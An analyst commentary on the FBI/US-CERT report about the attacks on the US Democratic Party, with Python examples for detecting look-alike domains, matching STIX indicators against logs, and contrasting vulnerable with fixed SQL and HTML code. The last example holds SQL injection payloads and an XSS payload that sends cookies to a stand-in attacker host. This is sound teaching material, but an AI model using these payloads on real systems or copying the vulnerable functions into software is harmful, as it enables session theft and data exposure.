On December 29th, the FBI together with US-CERT finally released a Joint Analysis Report on the cyber-attacks on the US Democratic Party during the US presidential election. Every organization, whether based in the US or not, would do well to read this report and to make sure it takes account of the recommendations. Once released into the wild, the tactics, techniques and procedures (TTPs) used by state actors are quickly taken up and become widely used by other adversaries.
This report is not a formal indictment of a crime, as was the case with the 2014 indictment over the alleged hacking of US companies by Chinese actors. It is, however, important cyber threat intelligence.
Threat intelligence is a vital part of cyber-defence and cyber-incident response. It provides information about the threats, TTPs and tools that cyber-adversaries employ, the systems and information they target, and other threat-related information that gives greater situational awareness. Such intelligence needs to be timely, relevant, accurate, specific and actionable, and this report provides exactly that.
The approaches described in the report are not new. They involve several phases. In one, a targeted spear-phishing campaign uses web links to a malicious website that installs code on the victim's machine. Once executed, the code deploys Remote Access Tools (RATs) and evades detection using a range of techniques. The malware connects back to the attackers, who then use the RATs to escalate privileges, enumerate Active Directory accounts, and exfiltrate email over encrypted connections.
Another approach uses internet domains whose names closely resemble those of the targeted organization to trick potential victims into entering their legitimate credentials; a fake webmail site that collects user credentials as people log in is a favourite. In this case, a spear-phishing email tricked recipients into "changing their passwords" through a fake webmail domain. Using the harvested credentials, the attacker was able to gain access and steal content.
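The look-alike domains described above are the kind of thing a mail gateway or link-rewriting proxy can flag before a user ever reaches the fake webmail page. The following is an added example, not code from the report or from KuppingerCole: it classifies the host in a URL as legitimate, a look-alike, or unrelated by (1) checking for a genuine subdomain of a known-good domain, (2) spotting the real name reused as leading labels of a domain registered elsewhere, and (3) measuring edit distance after mapping common homoglyphs (digits and Cyrillic letters that render like Latin ones). The domain list and the `example-party.org` names are assumptions constructed for the example.

```python
import unicodedata
from urllib.parse import urlsplit

# Constructed for this example: the organisation's real mail domains.
LEGITIMATE_DOMAINS = {"example-party.org", "mail.example-party.org"}

# Look-alike substitutions attackers use for Latin letters: digits and a few
# Cyrillic letters (written as escapes) that render identically in most fonts.
HOMOGLYPHS = str.maketrans({
    "0": "o", "1": "l", "3": "e", "5": "s", "7": "t",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0445": "x",
})


def normalise(host: str) -> str:
    """Lower-case, strip diacritics and map homoglyphs, so that
    'examp1e' and 'ex\u0430mple' both become 'example'."""
    host = unicodedata.normalize("NFKD", host.lower())
    host = "".join(ch for ch in host if not unicodedata.combining(ch))
    return host.translate(HOMOGLYPHS)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: insertions, deletions and substitutions."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host: str) -> str:
    """The last two labels of a host name. This is a simplification: it
    ignores multi-part public suffixes such as co.uk, which need a suffix list."""
    return ".".join(host.split(".")[-2:])


def classify_link(url: str, legit=LEGITIMATE_DOMAINS, max_distance: int = 2) -> str:
    """Return 'legitimate', 'lookalike' or 'unrelated' for the host in a URL."""
    host = (urlsplit(url).hostname or "").rstrip(".").lower()
    if not host:
        return "unrelated"
    # Exact match or a genuine subdomain of a legitimate domain.
    if any(host == d or host.endswith("." + d) for d in legit):
        return "legitimate"
    norm = normalise(host)
    for d in legit:
        nd = normalise(d)
        # The real name used as the leading labels of a domain registered
        # elsewhere, e.g. mail.example-party.org.evil.net
        if norm.startswith(nd + ".") or ("." + nd + ".") in norm:
            return "lookalike"
        # Typo- or homoglyph-squatting of the registrable part of the name.
        if edit_distance(registrable(norm), registrable(nd)) <= max_distance:
            return "lookalike"
    return "unrelated"
```

Internationalised domain names arrive in email as punycode (`xn--...`); decode them with `host.encode("ascii").decode("idna")` before calling `classify_link`, otherwise the homoglyph mapping never sees the Cyrillic letters. `max_distance` should be tuned to the length of your own domain names: a distance of 2 is reasonable for a long name like `example-party.org` but would produce false positives for a four-letter one.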
Sharing threat intelligence is a vital part of cyber defence, and OASIS recently made available three foundational specifications for sharing it. These are described in Executive View: Emerging Threat Intelligence Standards - 72528. The Indicators of Compromise (IOCs) associated with the cyber-actors are provided in one of these formats (STIX) as files accompanying the report.
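What makes an IOC file actionable is being able to run it against your own logs. The block below is an added example, not code from the report, OASIS or KuppingerCole: it reads the simple single-comparison indicator patterns from a STIX 2.x JSON bundle and matches them against proxy and endpoint log lines. The bundle, the indicator ids, the `c2-example.net` domain, the 203.0.113.7 address, the hash and the log lines are all constructed for the example; the assumption that the feed is STIX 2.x JSON is also the example's own, since STIX 1.x feeds are XML and need a different reader.

```python
import json
import re

# Constructed STIX 2.1 bundle for this example (ids, domain, address and hash are invented).
PLACEHOLDER_SHA256 = "0123456789abcdef" * 4
STIX_BUNDLE = json.dumps({
    "type": "bundle",
    "id": "bundle--0b7d1f0a-6a2c-4b1e-9f0e-5c3e2d1a0001",
    "objects": [
        {"type": "indicator", "spec_version": "2.1",
         "id": "indicator--0b7d1f0a-6a2c-4b1e-9f0e-5c3e2d1a0002",
         "pattern_type": "stix", "valid_from": "2016-12-29T00:00:00Z",
         "pattern": "[domain-name:value = 'update.c2-example.net']"},
        {"type": "indicator", "spec_version": "2.1",
         "id": "indicator--0b7d1f0a-6a2c-4b1e-9f0e-5c3e2d1a0003",
         "pattern_type": "stix", "valid_from": "2016-12-29T00:00:00Z",
         "pattern": "[ipv4-addr:value = '203.0.113.7']"},
        {"type": "indicator", "spec_version": "2.1",
         "id": "indicator--0b7d1f0a-6a2c-4b1e-9f0e-5c3e2d1a0004",
         "pattern_type": "stix", "valid_from": "2016-12-29T00:00:00Z",
         "pattern": "[file:hashes.'SHA-256' = '" + PLACEHOLDER_SHA256 + "']"},
        {"type": "malware", "spec_version": "2.1",
         "id": "malware--0b7d1f0a-6a2c-4b1e-9f0e-5c3e2d1a0005",
         "name": "example RAT", "is_family": False},
    ],
})

# Constructed log lines: three proxy entries and one endpoint file event.
SAMPLE_LOG = [
    "2016-12-20T09:14:02Z 10.0.0.15 GET http://update.c2-example.net/check.php 200",
    "2016-12-20T09:15:11Z 10.0.0.22 GET https://www.example-party.org/ 200",
    "2016-12-20T09:16:40Z 10.0.0.15 CONNECT 203.0.113.7:443 200",
    "2016-12-20T09:17:05Z 10.0.0.40 FILE C:\\Users\\x\\Downloads\\invoice.exe sha256=" + PLACEHOLDER_SHA256,
]

# Only the simple one-comparison pattern form: [object-type:property = 'value']
SIMPLE_PATTERN = re.compile(
    r"^\[(?P<obj>[\w-]+):(?P<prop>[\w.'-]+)\s*=\s*'(?P<value>[^']*)'\]$"
)
HOST_RE = re.compile(r"https?://([^/\s:]+)", re.I)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://\S+", re.I)
HASH_RE = re.compile(r"\b[0-9a-f]{64}\b", re.I)


def load_indicators(bundle_json: str) -> list:
    """Return (indicator id, object type, property, value) for every simple
    indicator pattern in a STIX 2.x bundle. Non-indicator objects and complex
    patterns (AND/OR, LIKE, MATCHES, observation operators) are skipped."""
    out = []
    for obj in json.loads(bundle_json)["objects"]:
        if obj.get("type") != "indicator":
            continue
        m = SIMPLE_PATTERN.match(obj["pattern"].strip())
        if m:
            out.append((obj["id"], m["obj"], m["prop"], m["value"].lower()))
    return out


def observables(line: str) -> dict:
    """Pull the observable values one log line exposes, keyed by STIX object type."""
    hosts = {h.lower() for h in HOST_RE.findall(line) if not IPV4_RE.fullmatch(h)}
    return {
        "domain-name": hosts,
        "ipv4-addr": set(IPV4_RE.findall(line)),
        "url": {u.lower() for u in URL_RE.findall(line)},
        "file": {h.lower() for h in HASH_RE.findall(line)},
    }


def match_log(lines, indicators) -> list:
    """Return (1-based line number, indicator id) for every line that contains an IOC."""
    hits = []
    for n, line in enumerate(lines, 1):
        seen = observables(line)
        for ind_id, obj, _prop, value in indicators:
            if value in seen.get(obj, ()):
                hits.append((n, ind_id))
    return hits


if __name__ == "__main__":
    for hit in match_log(SAMPLE_LOG, load_indicators(STIX_BUNDLE)):
        print("line %d matches %s" % hit)
```

Exact-match domain comparison is deliberate: widening it to "any subdomain of the indicator" is usually right for attacker-controlled domains but produces noise when a feed lists a shared hosting domain. For production use, the `stix2` and `stix2-patterns` libraries handle the full pattern grammar that this regex does not.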
There are several well-known classes of vulnerability that cyber-attackers exploit consistently. They are easy to fix but are, unfortunately, still commonly found in many organizations' IT systems. Organizations should take immediate steps to detect and remove them:
- SQL Injection - user input is spliced into the text of an SQL statement rather than passed as a bound parameter, so an attacker can change what the query does.
- Cross-Site Scripting - software fails to encode user input before placing it in output that is rendered as a web page, so attacker-supplied script runs in other users' browsers.
- Excessive or unnecessary administrative privileges - these let an adversary who compromises one account extend their control across multiple systems and applications.
- Unpatched server vulnerabilities - these may give an adversary access to critical information, including any websites or databases hosted on the server.
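The first two items are easiest to see side by side. The following is an added example, not code from the report or from KuppingerCole: a SQL lookup written with string concatenation next to the same lookup with a bound parameter, and an HTML template written without output encoding next to one that encodes. The in-memory `users` table and the attacker inputs are constructed for the example. The second injection payload shows why "checking for escape characters" is not the fix: the input does not need to break out of anything exotic, a single quote followed by `UNION` reads the database schema through the same query.

```python
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for a webmail back end."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "alice@example.org"), ("bob", "bob@example.org")])
    return conn


def lookup_vulnerable(conn, username: str) -> list:
    """Vulnerable: user input is spliced into the SQL text, so a quote in the
    input ends the literal and the rest is parsed as SQL."""
    query = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, username: str) -> list:
    """Fixed: the value travels as a bound parameter and is never parsed as SQL."""
    return conn.execute(
        "SELECT username, email FROM users WHERE username = ?", (username,)
    ).fetchall()


def render_vulnerable(display_name: str) -> str:
    """Vulnerable: untrusted text is placed into HTML without encoding (XSS)."""
    return "<p>Welcome, " + display_name + "</p>"


def render_safe(display_name: str) -> str:
    """Fixed: encode for the context the value lands in (HTML element body here).
    Attribute, JavaScript and URL contexts each need their own encoder."""
    return "<p>Welcome, " + html.escape(display_name, quote=True) + "</p>"


# Constructed attacker inputs.
SQLI_PAYLOAD = "' OR '1'='1"
SCHEMA_DUMP_PAYLOAD = "' UNION SELECT name, sql FROM sqlite_master --"
XSS_PAYLOAD = "<script>document.location='http://evil.example/?c='+document.cookie</script>"

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, SQLI_PAYLOAD))         # every row in the table
    print(lookup_vulnerable(db, SCHEMA_DUMP_PAYLOAD))  # the CREATE TABLE statement
    print(lookup_safe(db, SQLI_PAYLOAD))               # no such user: []
    print(render_vulnerable(XSS_PAYLOAD))              # script tag reaches the browser
    print(render_safe(XSS_PAYLOAD))                    # rendered as harmless text
```

The same rule carries over to every other database driver and template engine: the data must never be part of the code. Parameterised queries (or an ORM that uses them) remove SQL injection entirely, and a template engine that escapes by default, combined with a Content Security Policy, does the same for most XSS.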
The majority of these attacks exploit human weaknesses in their first stage. While technical measures can and should be improved, it is also imperative to train employees, associates and partners to recognize and respond to these threats.
The report describes a set of recommended mitigations and best practices. Organizations should consider these recommendations and take steps to implement them without delay. KuppingerCole provides extensive research on securing IT systems and on privilege management in particular.